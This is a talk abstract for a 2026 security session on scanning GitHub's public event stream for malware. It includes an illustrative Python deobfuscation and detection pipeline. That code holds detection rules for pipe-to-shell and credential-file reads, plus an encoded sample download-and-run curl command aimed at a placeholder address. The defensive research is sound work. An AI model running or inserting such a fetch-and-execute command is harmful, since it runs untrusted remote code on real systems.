
Saturday September 12, 2026 10:30am - 11:30am CDT
GitHub isn't just where developers work. It's where adversaries stage, obfuscate, and deliver malicious code. Every minute, thousands of commits hit public repositories, and buried inside that firehose are credential stealers, reverse shells, crypto drainers, and the occasional nation-state lure dressed up as a coding challenge. The platform's openness, trust, and sheer volume are exactly what make it useful to attackers: free hosting, free CDN, a developer-friendly domain in every allowlist, and a culture where running npm install or cloning a stranger's repo is just Tuesday.

This talk is about what happens when you actually try to watch all of it.

We'll walk through github-threat-scanner, a pipeline that consumes the GitHub public event stream in near real time, pulls down the code behind every push, and runs it through a stack of decoders and detection rules looking for anything that smells wrong. The interesting problems aren't where you'd expect. Ingesting the stream is easy. Storing it is a solved problem. The hard parts are everything in between: peeling back the layers of obfuscation attackers use to hide payloads, deciding what "malicious" even means when half the internet's legitimate code looks suspicious, and keeping false positives low enough that a human analyst can still trust the queue.

We'll dig into the deobfuscation engine (CyberSaucier), a library of CyberChef recipes that chain together XOR bruteforcing, base64 and hex decoding, packed-JavaScript unwrapping, PowerShell de-munging, and the other tricks that turn a wall of gibberish back into something a detection rule can match on. You'll see which recipes earn their keep, which ones we retired because they were pure theatre, and the surprisingly mundane reasons some decoders fail in production that never show up in a blog post.
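The recipe chaining described above, as an added example that is not code from github-threat-scanner or CyberSaucier: a small depth-first decoder stack (hex, base64, single-byte XOR brute force) that runs detection rules against every peeled layer. The two rules, the "looks like text" scoring, and the sample payload are all constructed for this example; the talk's own rule set and recipes are not on the page.

```python
import base64
import binascii
import re
import string
from typing import Callable, List, Optional, Tuple

# Detection rules applied to every decoded layer. Both patterns are assumed
# for this example; they are not the talk's own rules.
RULES = {
    "pipe-to-shell": re.compile(rb"(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"),
    "cloud-cred-read": re.compile(rb"AWS_SECRET_ACCESS_KEY|\.aws/credentials"),
}

PRINTABLE = frozenset(string.printable.encode("ascii"))
COMMON = frozenset(b" etaoinshrdlu")
MAX_DEPTH = 4   # how many encoding layers we are willing to peel
BRANCH = 3      # how many XOR candidates per layer get recursed into

Candidate = Tuple[str, bytes]   # (decoder label, decoded bytes)


def text_score(data: bytes) -> float:
    """Crude 'looks like text' score: ranks XOR candidates and gates the brute force."""
    if not data:
        return -1e9
    total = 0
    for b in data:
        if b in COMMON:
            total += 2
        elif b in PRINTABLE:
            total += 1
        else:
            total -= 5
    return total / len(data)


def decode_hex(data: bytes) -> List[Candidate]:
    s = data.strip()
    if len(s) < 8 or len(s) % 2 or not re.fullmatch(rb"[0-9a-fA-F]+", s):
        return []
    return [("hex", binascii.unhexlify(s))]


def decode_base64(data: bytes) -> List[Candidate]:
    s = data.strip()
    if len(s) < 8 or len(s) % 4 or not re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", s):
        return []
    try:
        return [("base64", base64.b64decode(s, validate=True))]
    except (binascii.Error, ValueError):
        return []


def decode_xor(data: bytes) -> List[Candidate]:
    """Single-byte XOR brute force (keys 1..255), best-looking output first.
    Input that already reads as text is skipped: brute-forcing it only yields noise."""
    if text_score(data) >= 1.0:
        return []
    outs = [(f"xor(0x{k:02x})", bytes(b ^ k for b in data)) for k in range(1, 256)]
    outs.sort(key=lambda c: text_score(c[1]), reverse=True)
    return outs


DECODERS: List[Callable[[bytes], List[Candidate]]] = [decode_hex, decode_base64, decode_xor]


def match_rules(data: bytes) -> Optional[Tuple[str, str]]:
    for name, rule in RULES.items():
        m = rule.search(data)
        if m:
            return name, m.group(0).decode("latin-1")
    return None


def scan(data: bytes, depth: int = 0, chain: Tuple[str, ...] = ()) -> Optional[dict]:
    """Depth-first peel: rules first, then each decoder, recursing only into likely outputs."""
    hit = match_rules(data)
    if hit:
        return {"rule": hit[0], "match": hit[1], "chain": list(chain)}
    if depth >= MAX_DEPTH:
        return None
    for decoder in DECODERS:
        candidates = decoder(data)
        # Cheap pass: rule-match every candidate before paying for recursion
        # (255 regex runs per XOR layer, not 255 subtrees).
        for label, out in candidates:
            hit = match_rules(out)
            if hit:
                return {"rule": hit[0], "match": hit[1], "chain": list(chain) + [label]}
        # Expensive pass: only the most text-like candidates get more layers peeled.
        for label, out in candidates[:BRANCH]:
            if out != data:
                found = scan(out, depth + 1, chain + (label,))
                if found:
                    return found
    return None


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def build_sample() -> bytes:
    """Constructed sample: a download-and-run one-liner under base64(hex(xor(...))).
    The address is from the TEST-NET range and the key is arbitrary; nothing here is real."""
    plaintext = b"curl -s http://203.0.113.5/stage.sh | sh"
    return base64.b64encode(binascii.hexlify(xor_bytes(plaintext, 0xC3)))


if __name__ == "__main__":
    print(scan(build_sample()))          # rule hit with the chain of decoders used
    print(scan(b"print('hello world')"))  # benign input: None
```

The design choice worth noting is where the rules run: matching every XOR candidate at the current layer is cheap, so the brute force only has to rank candidates well enough to pick which few get recursed into, not to identify the key on its own. The gate in decode_xor is the trade-off that goes with that: a key that leaves the ciphertext printable slips past it, so drop the gate if the budget allows the extra subtrees.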

Then we'll get to the fun part: who's actually out there. Commodity and nation-state actors treat GitHub Pages as disposable infrastructure. And threading through all of it are the targeted operations: DPRK-aligned clusters running fake job interviews and "technical assessments" that ship trojanized projects to developers at crypto firms, and long-running personas that maintain plausible commit histories for months before turning hostile.

You'll leave with a concrete picture of how to build this kind of visibility yourself, what the detection surface actually looks like once you're watching it, and why GitHub deserves a seat in your threat model next to email and the browser. If you run a security team, you'll walk out with questions to take back to your developers. If you write detections, you'll have new ideas for where to point them. And if you just like watching adversaries do dumb things at scale, there will be plenty of that too.


The best part of all of this? Most of this data was initially triaged and analyzed by an autonomous AI analyst running in a throwaway VM in dangerous mode, unafraid of touching actual adversary infrastructure.

No prior knowledge of GitHub internals required. Bring opinions about regex.
Speakers

Justin Borland

Director of Threat Engineering, Abstract
A proven technical leader in the security industry, Justin started his career with a Canadian Secret clearance while still in college. After graduating, he spent the next decade building custom packet capture systems, intrusion detection systems, logging systems, and DFIR tooling...
Swissôtel Chicago 323 E Wacker Dr, Chicago, IL 60601, USA
Talk
